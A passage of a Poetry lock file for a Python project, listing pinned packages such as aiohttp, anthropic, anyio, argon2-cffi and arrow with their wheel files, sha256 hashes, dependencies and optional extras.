"sha256:ad1407db8f2f49329729564f71685557157bfa42b48f4b93e53721a16eb813ed"}, {file = "aiohttp-3.8.6-cp310-cp310-win32.whl", hash = "sha256:ccc360e87341ad47c777f5723f68adbb52b37ab450c8bc3ca9ca1f3e849e5fe2"}, {file = "aiohttp-3.8.6-cp310-cp310-win_amd64.whl", hash = "sha256:93c15c8e48e5e7b89d5cb4613479d144fda8344e2d886cf694fd36db4cc86865"}, {file = "aiohttp-3.8.6-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:6e2f9cc8e5328f829f6e1fb74a0a3a939b14e67e80832975e01929e320386b34"}, {file = "aiohttp-3.8.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:e6a00ffcc173e765e200ceefb06399ba09c06db97f401f920513a10c803604ca"}, {file = "aiohttp-3.8.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:41bdc2ba359032e36c0e9de5a3bd00d6fb7ea558a6ce6b70acedf0da86458321"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14cd52ccf40006c7a6cd34a0f8663734e5363fd981807173faf3a017e202fec9"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2d5b785c792802e7b275c420d84f3397668e9d49ab1cb52bd916b3b3ffcf09ad"}, {file = 
"aiohttp-3.8.6-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1bed815f3dc3d915c5c1e556c397c8667826fbc1b935d95b0ad680787896a358"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:96603a562b546632441926cd1293cfcb5b69f0b4159e6077f7c7dbdfb686af4d"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d76e8b13161a202d14c9584590c4df4d068c9567c99506497bdd67eaedf36403"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e3f1e3f1a1751bb62b4a1b7f4e435afcdade6c17a4fd9b9d43607cebd242924a"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:76b36b3124f0223903609944a3c8bf28a599b2cc0ce0be60b45211c8e9be97f8"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:a2ece4af1f3c967a4390c284797ab595a9f1bc1130ef8b01828915a05a6ae684"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:16d330b3b9db87c3883e565340d292638a878236418b23cc8b9b11a054aaa887"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:42c89579f82e49db436b69c938ab3e1559e5a4409eb8639eb4143989bc390f2f"}, {file = "aiohttp-3.8.6-cp311-cp311-win32.whl", hash = "sha256:efd2fcf7e7b9d7ab16e6b7d54205beded0a9c8566cb30f09c1abe42b4e22bdcb"}, {file = "aiohttp-3.8.6-cp311-cp311-win_amd64.whl", hash = "sha256:3b2ab182fc28e7a81f6c70bfbd829045d9480063f5ab06f6e601a3eddbbd49a0"}, {file = "aiohttp-3.8.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:fdee8405931b0615220e5ddf8cd7edd8592c606a8e4ca2a00704883c396e4479"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d25036d161c4fe2225d1abff2bd52c34ed0b1099f02c208cd34d8c05729882f0"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5d791245a894be071d5ab04bbb4850534261a7d4fd363b094a7b9963e8cdbd31"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0cccd1de239afa866e4ce5c789b3032442f19c261c7d8a01183fd956b1935349"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1f13f60d78224f0dace220d8ab4ef1dbc37115eeeab8c06804fec11bec2bbd07"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8a9b5a0606faca4f6cc0d338359d6fa137104c337f489cd135bb7fbdbccb1e39"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:13da35c9ceb847732bf5c6c5781dcf4780e14392e5d3b3c689f6d22f8e15ae31"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:4d4cbe4ffa9d05f46a28252efc5941e0462792930caa370a6efaf491f412bc66"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:229852e147f44da0241954fc6cb910ba074e597f06789c867cb7fb0621e0ba7a"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_s390x.whl", hash = "sha256:713103a8bdde61d13490adf47171a1039fd880113981e55401a0f7b42c37d071"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:45ad816b2c8e3b60b510f30dbd37fe74fd4a772248a52bb021f6fd65dff809b6"}, {file = "aiohttp-3.8.6-cp36-cp36m-win32.whl", hash = "sha256:2b8d4e166e600dcfbff51919c7a3789ff6ca8b3ecce16e1d9c96d95dd569eb4c"}, {file = "aiohttp-3.8.6-cp36-cp36m-win_amd64.whl", hash = "sha256:0912ed87fee967940aacc5306d3aa8ba3a459fcd12add0b407081fbefc931e53"}, {file = "aiohttp-3.8.6-cp37-cp37m-macosx_10_9_x86_64.whl", 
hash = "sha256:e2a988a0c673c2e12084f5e6ba3392d76c75ddb8ebc6c7e9ead68248101cd446"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ebf3fd9f141700b510d4b190094db0ce37ac6361a6806c153c161dc6c041ccda"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3161ce82ab85acd267c8f4b14aa226047a6bee1e4e6adb74b798bd42c6ae1f80"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d95fc1bf33a9a81469aa760617b5971331cdd74370d1214f0b3109272c0e1e3c"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c43ecfef7deaf0617cee936836518e7424ee12cb709883f2c9a1adda63cc460"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca80e1b90a05a4f476547f904992ae81eda5c2c85c66ee4195bb8f9c5fb47f28"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:90c72ebb7cb3a08a7f40061079817133f502a160561d0675b0a6adf231382c92"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:bb54c54510e47a8c7c8e63454a6acc817519337b2b78606c4e840871a3e15349"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:de6a1c9f6803b90e20869e6b99c2c18cef5cc691363954c93cb9adeb26d9f3ae"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:a3628b6c7b880b181a3ae0a0683698513874df63783fd89de99b7b7539e3e8a8"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:fc37e9aef10a696a5a4474802930079ccfc14d9f9c10b4662169671ff034b7df"}, {file = "aiohttp-3.8.6-cp37-cp37m-win32.whl", hash = "sha256:f8ef51e459eb2ad8e7a66c1d6440c808485840ad55ecc3cafefadea47d1b1ba2"}, {file = "aiohttp-3.8.6-cp37-cp37m-win_amd64.whl", hash = "sha256:b2fe42e523be344124c6c8ef32a011444e869dc5f883c591ed87f84339de5976"}, {file = "aiohttp-3.8.6-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:9e2ee0ac5a1f5c7dd3197de309adfb99ac4617ff02b0603fd1e65b07dc772e4b"}, {file = "aiohttp-3.8.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:01770d8c04bd8db568abb636c1fdd4f7140b284b8b3e0b4584f070180c1e5c62"}, {file = "aiohttp-3.8.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:3c68330a59506254b556b99a91857428cab98b2f84061260a67865f7f52899f5"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:89341b2c19fb5eac30c341133ae2cc3544d40d9b1892749cdd25892bbc6ac951"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:71783b0b6455ac8f34b5ec99d83e686892c50498d5d00b8e56d47f41b38fbe04"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f628dbf3c91e12f4d6c8b3f092069567d8eb17814aebba3d7d60c149391aee3a"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b04691bc6601ef47c88f0255043df6f570ada1a9ebef99c34bd0b72866c217ae"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7ee912f7e78287516df155f69da575a0ba33b02dd7c1d6614dbc9463f43066e3"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9c19b26acdd08dd239e0d3669a3dddafd600902e37881f13fbd8a53943079dbc"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:99c5ac4ad492b4a19fc132306cd57075c28446ec2ed970973bbf036bcda1bcc6"}, {file = 
"aiohttp-3.8.6-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f0f03211fd14a6a0aed2997d4b1c013d49fb7b50eeb9ffdf5e51f23cfe2c77fa"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:8d399dade330c53b4106160f75f55407e9ae7505263ea86f2ccca6bfcbdb4921"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:ec4fd86658c6a8964d75426517dc01cbf840bbf32d055ce64a9e63a40fd7b771"}, {file = "aiohttp-3.8.6-cp38-cp38-win32.whl", hash = "sha256:33164093be11fcef3ce2571a0dccd9041c9a93fa3bde86569d7b03120d276c6f"}, {file = "aiohttp-3.8.6-cp38-cp38-win_amd64.whl", hash = "sha256:bdf70bfe5a1414ba9afb9d49f0c912dc524cf60141102f3a11143ba3d291870f"}, {file = "aiohttp-3.8.6-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:d52d5dc7c6682b720280f9d9db41d36ebe4791622c842e258c9206232251ab2b"}, {file = "aiohttp-3.8.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:4ac39027011414dbd3d87f7edb31680e1f430834c8cef029f11c66dad0670aa5"}, {file = "aiohttp-3.8.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3f5c7ce535a1d2429a634310e308fb7d718905487257060e5d4598e29dc17f0b"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b30e963f9e0d52c28f284d554a9469af073030030cef8693106d918b2ca92f54"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:918810ef188f84152af6b938254911055a72e0f935b5fbc4c1a4ed0b0584aed1"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:002f23e6ea8d3dd8d149e569fd580c999232b5fbc601c48d55398fbc2e582e8c"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4fcf3eabd3fd1a5e6092d1242295fa37d0354b2eb2077e6eb670accad78e40e1"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:255ba9d6d5ff1a382bb9a578cd563605aa69bec845680e21c44afc2670607a95"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:d67f8baed00870aa390ea2590798766256f31dc5ed3ecc737debb6e97e2ede78"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:86f20cee0f0a317c76573b627b954c412ea766d6ada1a9fcf1b805763ae7feeb"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:39a312d0e991690ccc1a61f1e9e42daa519dcc34ad03eb6f826d94c1190190dd"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:e827d48cf802de06d9c935088c2924e3c7e7533377d66b6f31ed175c1620e05e"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bd111d7fc5591ddf377a408ed9067045259ff2770f37e2d94e6478d0f3fc0c17"}, {file = "aiohttp-3.8.6-cp39-cp39-win32.whl", hash = "sha256:caf486ac1e689dda3502567eb89ffe02876546599bbf915ec94b1fa424eeffd4"}, {file = "aiohttp-3.8.6-cp39-cp39-win_amd64.whl", hash = "sha256:3f0e27e5b733803333bb2371249f41cf42bae8884863e8e8965ec69bebe53132"}, {file = "aiohttp-3.8.6.tar.gz", hash = "sha256:b0cf2a4501bff9330a8a5248b4ce951851e415bdcce9dc158e76cfd55e15085c"}, ] [package.dependencies] aiosignal = ">=1.1.2" async-timeout = ">=4.0.0a3,<5.0" attrs = ">=17.3.0" charset-normalizer = ">=2.0,<4.0" frozenlist = ">=1.1.1" multidict = ">=4.5,<7.0" yarl = ">=1.0,<2.0" [package.extras] speedups = ["Brotli", "aiodns", "cchardet"] [[package]] name = "aiohttp-retry" version = "2.8.3" description = "Simple retry client for aiohttp" optional = true python-versions = ">=3.7" files = [ {file = "aiohttp_retry-2.8.3-py3-none-any.whl", hash = 
"sha256:3aeeead8f6afe48272db93ced9440cf4eda8b6fd7ee2abb25357b7eb28525b45"}, {file = "aiohttp_retry-2.8.3.tar.gz", hash = "sha256:9a8e637e31682ad36e1ff9f8bcba912fcfc7d7041722bc901a4b948da4d71ea9"}, ] [package.dependencies] aiohttp = "*" [[package]] name = "aioitertools" version = "0.11.0" description = "itertools and builtins for AsyncIO and mixed iterables" optional = true python-versions = ">=3.6" files = [ {file = "aioitertools-0.11.0-py3-none-any.whl", hash = "sha256:04b95e3dab25b449def24d7df809411c10e62aab0cbe31a50ca4e68748c43394"}, {file = "aioitertools-0.11.0.tar.gz", hash = "sha256:42c68b8dd3a69c2bf7f2233bf7df4bb58b557bca5252ac02ed5187bbc67d6831"}, ] [package.dependencies] typing_extensions = {version = ">=4.0", markers = "python_version < \"3.10\""} [[package]] name = "aiosignal" version = "1.3.1" description = "aiosignal: a list of registered asynchronous callbacks" optional = false python-versions = ">=3.7" files = [ {file = "aiosignal-1.3.1-py3-none-any.whl", hash = "sha256:f8376fb07dd1e86a584e4fcdec80b36b7f81aac666ebc724e2c090300dd83b17"}, {file = "aiosignal-1.3.1.tar.gz", hash = "sha256:54cd96e15e1649b75d6c87526a6ff0b6c1b0dd3459f43d9ca11d48c339b68cfc"}, ] [package.dependencies] frozenlist = ">=1.1.0" [[package]] name = "aiosqlite" version = "0.19.0" description = "asyncio bridge to the standard sqlite3 module" optional = true python-versions = ">=3.7" files = [ {file = "aiosqlite-0.19.0-py3-none-any.whl", hash = "sha256:edba222e03453e094a3ce605db1b970c4b3376264e56f32e2a4959f948d66a96"}, {file = "aiosqlite-0.19.0.tar.gz", hash = "sha256:95ee77b91c8d2808bd08a59fbebf66270e9090c3d92ffbf260dc0db0b979577d"}, ] [package.extras] dev = ["aiounittest (==1.4.1)", "attribution (==1.6.2)", "black (==23.3.0)", "coverage[toml] (==7.2.3)", "flake8 (==5.0.4)", "flake8-bugbear (==23.3.12)", "flit (==3.7.1)", "mypy (==1.2.0)", "ufmt (==2.1.0)", "usort (==1.0.6)"] docs = ["sphinx (==6.1.3)", "sphinx-mdinclude (==0.5.3)"] [[package]] name = "aleph-alpha-client" version = "2.17.0" description = "python client to interact with Aleph Alpha api endpoints" optional = true python-versions = "*" files = [ {file = "aleph-alpha-client-2.17.0.tar.gz", hash = "sha256:c2d664c7b829f4932306153bec45e11c08e03252f1dbfd9f48584c402d7050a3"}, {file = "aleph_alpha_client-2.17.0-py3-none-any.whl", hash = "sha256:9106a36a5e08dba6aea2b0b2a0de6ff0c3bb77926edc98226debae121b0925e2"}, ] [package.dependencies] aiodns = ">=3.0.0" aiohttp = ">=3.8.3" aiohttp-retry = ">=2.8.3" Pillow = ">=9.2.0" requests = ">=2.28" tokenizers = ">=0.13.2" typing-extensions = ">=4.5.0" urllib3 = ">=1.26" [package.extras] dev = ["black", "ipykernel", "mypy", "nbconvert", "pytest", "pytest-aiohttp", "pytest-cov", "pytest-dotenv", "pytest-httpserver", "types-Pillow", "types-requests"] docs = ["sphinx", "sphinx-rtd-theme"] test = ["pytest", "pytest-aiohttp", "pytest-cov", "pytest-dotenv", "pytest-httpserver"] types = ["mypy", "types-Pillow", "types-requests"] [[package]] name = "altair" version = "4.2.2" description = "Altair: A declarative statistical visualization library for Python." 
optional = true python-versions = ">=3.7" files = [ {file = "altair-4.2.2-py3-none-any.whl", hash = "sha256:8b45ebeaf8557f2d760c5c77b79f02ae12aee7c46c27c06014febab6f849bc87"}, {file = "altair-4.2.2.tar.gz", hash = "sha256:39399a267c49b30d102c10411e67ab26374156a84b1aeb9fcd15140429ba49c5"}, ] [package.dependencies] entrypoints = "*" jinja2 = "*" jsonschema = ">=3.0" numpy = "*" pandas = ">=0.18" toolz = "*" [package.extras] dev = ["black", "docutils", "flake8", "ipython", "m2r", "mistune (<2.0.0)", "pytest", "recommonmark", "sphinx", "vega-datasets"] [[package]] name = "amadeus" version = "9.0.0" description = "Python module for the Amadeus travel APIs" optional = true python-versions = ">=3.4.8" files = [ {file = "amadeus-9.0.0.tar.gz", hash = "sha256:d19805e19d699d2633911c5b52400f82c6719676cc1488f8ccf344dbc4eb3202"}, ] [[package]] name = "amazon-textract-caller" version = "0.2.1" description = "Amazon Textract Caller tools" optional = true python-versions = ">=3.6" files = [ {file = "amazon-textract-caller-0.2.1.tar.gz", hash = "sha256:7a531ba4841fb64718b9430c05796958b426f41a4d674d4996f9e56cd3849f4e"}, {file = "amazon_textract_caller-0.2.1-py2.py3-none-any.whl", hash = "sha256:ccdeb364e02ce7c2034b69c09209954e995a0ee19f5d3dea79f25171a9565c37"}, ] [package.dependencies] amazon-textract-response-parser = ">=0.1.39" boto3 = ">=1.26.35" botocore = "*" [package.extras] testing = ["amazon-textract-response-parser", "pytest"] [[package]] name = "amazon-textract-response-parser" version = "1.0.1" description = "Easily parse JSON returned by Amazon Textract." optional = true python-versions = ">=3.8" files = [ {file = "amazon-textract-response-parser-1.0.1.tar.gz", hash = "sha256:d9ddedb75d12c9f5dc7cf65811c96c3934c0dfa8ef76543882cc1077618a301f"}, {file = "amazon_textract_response_parser-1.0.1-py2.py3-none-any.whl", hash = "sha256:890eba2c6bc33f4088c08c4df93088cd540896eca3243b7612635ea456f759c7"}, ] [package.dependencies] boto3 = "*" marshmallow = ">=3.14,<4" [[package]] name = "anthropic" version = "0.3.11" description = "Client library for the anthropic API" optional = false python-versions = ">=3.7,<4.0" files = [ {file = "anthropic-0.3.11-py3-none-any.whl", hash = "sha256:5c81105cd9ee7388bff3fdb739aaddedc83bbae9b95d51c2d50c13b1ad106138"}, {file = "anthropic-0.3.11.tar.gz", hash = "sha256:2e0fa5351c9b368cbed0bbd7217deaa9409b82b56afaf244e2196e99eb4fe20e"}, ] [package.dependencies] anyio = ">=3.5.0,<4" distro = ">=1.7.0,<2" httpx = ">=0.23.0,<1" pydantic = ">=1.9.0,<3" tokenizers = ">=0.13.0" typing-extensions = ">=4.5,<5" [[package]] name = "anyio" version = "3.7.1" description = "High level compatibility layer for multiple asynchronous event loop implementations" optional = false python-versions = ">=3.7" files = [ {file = "anyio-3.7.1-py3-none-any.whl", hash = "sha256:91dee416e570e92c64041bd18b900d1d6fa78dff7048769ce5ac5ddad004fbb5"}, {file = "anyio-3.7.1.tar.gz", hash = "sha256:44a3c9aba0f5defa43261a8b3efb97891f2bd7d804e0e1f56419befa1adfc780"}, ] [package.dependencies] exceptiongroup = {version = "*", markers = "python_version < \"3.11\""} idna = ">=2.8" sniffio = ">=1.1" [package.extras] doc = ["Sphinx", "packaging", "sphinx-autodoc-typehints (>=1.2.0)", "sphinx-rtd-theme (>=1.2.2)", "sphinxcontrib-jquery"] test = ["anyio[trio]", "coverage[toml] (>=4.5)", "hypothesis (>=4.0)", "mock (>=4)", "psutil (>=5.9)", "pytest (>=7.0)", "pytest-mock (>=3.6.1)", "trustme", "uvloop (>=0.17)"] trio = ["trio (<0.22)"] [[package]] name = "appnope" version = "0.1.3" description = "Disable App Nap on macOS >= 
10.9" optional = false python-versions = "*" files = [ {file = "appnope-0.1.3-py2.py3-none-any.whl", hash = "sha256:265a455292d0bd8a72453494fa24df5a11eb18373a60c7c0430889f22548605e"}, {file = "appnope-0.1.3.tar.gz", hash = "sha256:02bd91c4de869fbb1e1c50aafc4098827a7a54ab2f39d9dcba6c9547ed920e24"}, ] [[package]] name = "argon2-cffi" version = "23.1.0" description = "Argon2 for Python" optional = false python-versions = ">=3.7" files = [ {file = "argon2_cffi-23.1.0-py3-none-any.whl", hash = "sha256:c670642b78ba29641818ab2e68bd4e6a78ba53b7eff7b4c3815ae16abf91c7ea"}, {file = "argon2_cffi-23.1.0.tar.gz", hash = "sha256:879c3e79a2729ce768ebb7d36d4609e3a78a4ca2ec3a9f12286ca057e3d0db08"}, ] [package.dependencies] argon2-cffi-bindings = "*" [package.extras] dev = ["argon2-cffi[tests,typing]", "tox (>4)"] docs = ["furo", "myst-parser", "sphinx", "sphinx-copybutton", "sphinx-notfound-page"] tests = ["hypothesis", "pytest"] typing = ["mypy"] [[package]] name = "argon2-cffi-bindings" version = "21.2.0" description = "Low-level CFFI bindings for Argon2" optional = false python-versions = ">=3.6" files = [ {file = "argon2-cffi-bindings-21.2.0.tar.gz", hash = "sha256:bb89ceffa6c791807d1305ceb77dbfacc5aa499891d2c55661c6459651fc39e3"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:ccb949252cb2ab3a08c02024acb77cfb179492d5701c7cbdbfd776124d4d2367"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9524464572e12979364b7d600abf96181d3541da11e23ddf565a32e70bd4dc0d"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b746dba803a79238e925d9046a63aa26bf86ab2a2fe74ce6b009a1c3f5c8f2ae"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:58ed19212051f49a523abb1dbe954337dc82d947fb6e5a0da60f7c8471a8476c"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:bd46088725ef7f58b5a1ef7ca06647ebaf0eb4baff7d1d0d177c6cc8744abd86"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_i686.whl", hash = "sha256:8cd69c07dd875537a824deec19f978e0f2078fdda07fd5c42ac29668dda5f40f"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:f1152ac548bd5b8bcecfb0b0371f082037e47128653df2e8ba6e914d384f3c3e"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-win32.whl", hash = "sha256:603ca0aba86b1349b147cab91ae970c63118a0f30444d4bc80355937c950c082"}, {file = "argon2_cffi_bindings-21.2.0-cp36-abi3-win_amd64.whl", hash = "sha256:b2ef1c30440dbbcba7a5dc3e319408b59676e2e039e2ae11a8775ecf482b192f"}, {file = "argon2_cffi_bindings-21.2.0-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:e415e3f62c8d124ee16018e491a009937f8cf7ebf5eb430ffc5de21b900dad93"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3e385d1c39c520c08b53d63300c3ecc28622f076f4c2b0e6d7e796e9f6502194"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2c3e3cc67fdb7d82c4718f19b4e7a87123caf8a93fde7e23cf66ac0337d3cb3f"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a22ad9800121b71099d0fb0a65323810a15f2e292f2ba450810a7316e128ee5"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash 
= "sha256:f9f8b450ed0547e3d473fdc8612083fd08dd2120d6ac8f73828df9b7d45bb351"}, {file = "argon2_cffi_bindings-21.2.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:93f9bf70084f97245ba10ee36575f0c3f1e7d7724d67d8e5b08e61787c320ed7"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3b9ef65804859d335dc6b31582cad2c5166f0c3e7975f324d9ffaa34ee7e6583"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d4966ef5848d820776f5f562a7d45fdd70c2f330c961d0d745b784034bd9f48d"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:20ef543a89dee4db46a1a6e206cd015360e5a75822f76df533845c3cbaf72670"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ed2937d286e2ad0cc79a7087d3c272832865f779430e0cc2b4f3718d3159b0cb"}, {file = "argon2_cffi_bindings-21.2.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:5e00316dabdaea0b2dd82d141cc66889ced0cdcbfa599e8b471cf22c620c329a"}, ] [package.dependencies] cffi = ">=1.0.1" [package.extras] dev = ["cogapp", "pre-commit", "pytest", "wheel"] tests = ["pytest"] [[package]] name = "arrow" version = "1.3.0" description = "Better dates & times for Python" optional = false python-versions = ">=3.8" files = [ {file = "arrow-1.3.0-py3-none-any.whl", hash = "sha256:c728b120ebc00eb84e01882a6f5e7927a53960aa990ce7dd2b10f39005a67f80"}, {file = "arrow-1.3.0.tar.gz", hash = "sha256:d4540617648cb5f895730f1ad8c82a65f2dad0166f57b75f3ca54759c4d67a85"}, ] [package.dependencies] python-dateutil = ">=2.7.0" types-python-dateutil = ">=2.8.10" [package.extras] doc = ["doc8", "sphinx (>=7.0.0)", "sphinx-autobuild", "sphinx-autodoc-typehints", "sphinx_rtd_theme (>=1.3.0)"] test = ["dateparser (==1.*)", "pre-commit", "pytest", "pytest-cov", "pytest-mock", "pytz (==2021.1)", "simplejson (==3.*)"] [[package]] name = "arxiv" version = "1.4.8" description = "Python wrapper for the arXiv API: http://arxiv.org/help/api/" optional = true python-versions = ">=3.7" files = [ {file = "arxiv-1.4.8-py3-none-any.whl", hash = "sha256:c3dbef0fb7ed85c9b4c2157b40a62f5a04ce0d2f63c3ff7caa7798abf6166378"}, {file = "arxiv-1.4.8.tar.gz", hash = "sha256:2a818ea749eaa62a6e24fc31d53b769b4d33ff55cfc5dda7c7b7d309a3b29373"}, ] [package.dependencies] feedparser = "*" [[package]] name = "assemblyai" version = "0.17.0" description = "AssemblyAI Python SDK" optional = true python-versions = ">=3.8" files = [ {file = "assemblyai-0.17.0-py3-none-any.whl", hash = "sha256:3bad8cc7545b5b831f243f1b2f01bc4cc0e8aad78babf44c8008f2293c540e36"}, {file = "assemblyai-0.17.0.tar.gz", hash = "sha256:6d5bbfbbaa626ed021c3d3dec0ca52b3ebf6e6ef277ac76a7a6aed52182d531e"}, ] [package.dependencies] httpx = ">=0.19.0" pydantic = ">=1.7.0,<1.10.7 || >1.10.7" typing-extensions = ">=3.7" websockets = ">=11.0" [package.extras] extras = ["pyaudio (>=0.2.13)"] [[package]] name = "asttokens" version = "2.4.1" description = "Annotate AST trees with source code positions" optional = false python-versions = "*" files = [ {file = 